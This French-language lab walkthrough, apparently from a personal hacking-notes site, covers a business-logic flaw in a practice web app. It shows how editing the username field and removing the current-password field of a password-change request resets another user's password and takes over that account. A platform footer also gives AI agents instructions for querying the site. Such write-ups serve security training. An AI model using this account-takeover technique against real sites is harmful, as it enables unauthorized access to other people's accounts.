> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/business-logic/low-isolation-on-a-dual-use-endpoint.md).

# Faible isolation sur un point de terminaison à double usage

### Isolement faible sur un point de terminaison à double usage

**Description du laboratoire**

Ce laboratoire repose sur une hypothèse erronée concernant le niveau de privilèges de l’utilisateur, basée uniquement sur les paramètres envoyés par le client. / En exploitant une faille logique dans la fonctionnalité de gestion des comptes, il est possible de prendre le contrôle de comptes arbitraires, y compris le compte administrateur.

\*\* Objectif :\*\*/ Accéder au compte administrateur et supprimer l’utilisateur **carlos**.

**Identifiants fournis :**

* Utilisateur : `wiener`
* Mot de passe : `peter`

<figure><img src="/files/76337e46c9d65f4def8512c7abad628389360066" alt=""><figcaption></figcaption></figure>

**Observation du mécanisme de changement de mot de passe**

Une fois connecté au `wiener` compte, une fonctionnalité permet de changer le mot de passe. / La requête envoyée au serveur est la suivante :

```bash
csrf=3wgY9AYHzbOWg73KitML2AQkY0fef2kK
&username=wiener
&current-password=peter
&new-password-1=jordan
&new-password-2=jordan
```

Le serveur utilise le `le nom d'utilisateur` paramètre fourni par le client pour déterminer le compte à modifier.

<figure><img src="/files/acefdd6c8813671e4a78b90039f8cd1be9df0bf2" alt=""><figcaption></figcaption></figure>

**Exploitation de la faille logique**

En modifiant la requête, il est possible de cibler un autre utilisateur.

<figure><img src="/files/ac4d55e537c9065d18a1dd60743234670a18232c" alt=""><figcaption></figcaption></figure>

De plus, le `current-password` paramètre n’est pas correctement vérifié.

Requête utilisateur modifiée **carlos**:

{% code overflow="wrap" %}

```bash
csrf=3wgY9AYHzbOWg73KitML2AQkY0fef2kK
&username=carlos
&new-password-1=jordan
&new-password-2=jordan
```

{% endcode %}

<figure><img src="/files/502eedbabaf30d69a4b5fffe4785212256947910" alt=""><figcaption></figcaption></figure>

Le serveur accepte la requête et modifie le mot de passe du compte **carlos**, sans demander l’ancien mot de passe.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/business-logic/low-isolation-on-a-dual-use-endpoint.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
